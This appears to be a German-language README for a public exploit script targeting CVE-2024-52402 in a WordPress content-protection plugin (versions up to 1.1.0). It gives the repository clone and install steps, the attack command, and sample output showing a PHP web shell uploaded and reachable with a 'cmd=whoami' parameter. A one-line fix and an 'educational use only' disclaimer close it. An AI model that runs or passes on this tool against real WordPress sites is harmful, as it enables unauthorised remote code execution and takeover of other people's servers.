
WordPress Exclusive Content Password Protect Plugin <= 1.1.0 - CSRF to Arbitrary File Upload Schwachstelle
Dieser Exploit zielt auf eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle im WordPress Exclusive Content Password Protect Plugin, Versionen bis einschließlich 1.1.0. Diese Schwachstelle ermöglicht es einem Angreifer, eine Web-Shell auf den Webserver hochzuladen, was zu potenzieller Remote-Code-Ausführung führt.
Um diese Schwachstelle auszunutzen, müssen Sie die Ziel-URL der WordPress-Website, einen gültigen WordPress-Benutzernamen und ein Passwort angeben. Das Exploit-Skript meldet sich bei der WordPress-Website an und versucht, eine Web-Shell hochzuladen.
python CVE-2024-52402.py -u <target> -un <username> -p <password>
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
Dieses Skript nutzt die CSRF-Schwachstelle im Exclusive Content Password Protect Plugin aus, um eine Web-Shell auf den WordPress-Server hochzuladen. Es führt jedoch keinen direkten CSRF-Angriff durch; stattdessen konzentriert es sich darauf, die Datei-Upload-Funktionalität des Plugins für die Ausnutzung zu verwenden.
Repository klonen
git clone https://github.com/Nxploited/CVE-2024-52402.git
cd CVE-2024-52402
Anforderungen installieren
Stellen Sie sicher, dass die requests-Bibliothek installiert ist:
pip install requests
Skript ausführen Verwenden Sie den folgenden Befehl, um das Skript auszuführen:
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
Um diese Schwachstelle zu beheben, aktualisieren Sie das Exclusive Content Password Protect Plugin auf die neueste Version, in der dieses Problem behoben wurde.
Dieses Skript ist nur für Bildungszwecke gedacht. Die unbefugte Verwendung dieses Skripts gegen Systeme, für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.
Exploit von: Nxploit, Khaled alenazi.